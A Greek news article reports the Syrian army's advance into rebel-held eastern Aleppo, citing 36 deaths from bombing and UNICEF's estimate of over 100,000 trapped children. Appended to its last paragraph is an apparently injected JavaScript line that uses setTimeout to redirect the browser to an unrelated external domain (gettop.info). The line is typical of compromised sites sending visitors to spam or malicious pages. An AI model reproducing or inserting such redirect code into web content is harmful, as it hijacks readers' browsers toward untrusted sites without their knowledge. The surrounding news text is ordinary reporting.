Εφιάλτης το Χαλέπι για τους αμάχους – Εγκλωβισμένα 100.000 παιδιά

 

Συνεχίζουν την προέλασή τους οι δυνάμεις του Μπασάρ αλ Άσαντ μέσα στο Χλέπι προσπαθώντας να επανακταλάβουν τις ανταρτοκρατούμενες συνοικίες της πόλης, παρά τις διεθνείς ανησυχίες για την τύχη της πόλης και των κατοίκων.

«Τουλάχιστον 36 άνθρωποι σκοτώθηκαν από τους χθεσινούς βομβαρδισμούς», δήλωσε ο διασώστης Ιμπραχίμ Αμπού Λάιτ στο Al Jazeera. «Αυτές είναι οι πιο βίαιες επιθέσεις που έχουμε δει τα τελευταία πέντε χρόνια».

Η διεθνής κοινότητα δεν φαίνεται να είναι σε θέση να σταματήσει την προέλαση του συριακού στρατού, παρ’ ότι έχει εκφράσει την αγανάκτησή της για τον αυξανόμενο αριθμό των αμάχων που χάνουν τη ζωή τους και για τη στοχοθέτηση των νοσοκομείων και των εγκαταστάσεων των διασωστών στις ανατολικές συνοικίες της πόλης. Μάλιστα, σύμφωνα με τα στοιχεία της Unicef περισσότερα από 100.000 παιδιά είναι παγιδευμένα στο ανατολικό Χαλέπι.

Οι δυνάμεις των ανταρτών χάνουν συστηματικά έδαφος μετά την εμπλοκή της Μόσχας, βασικού συμμάχου του Σύρου προέδρου Μπασάρ αλ Άσαντ, στη σύρραξη. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

Σχετικά Άρθρα


Αφήστε το σχόλιο σας

*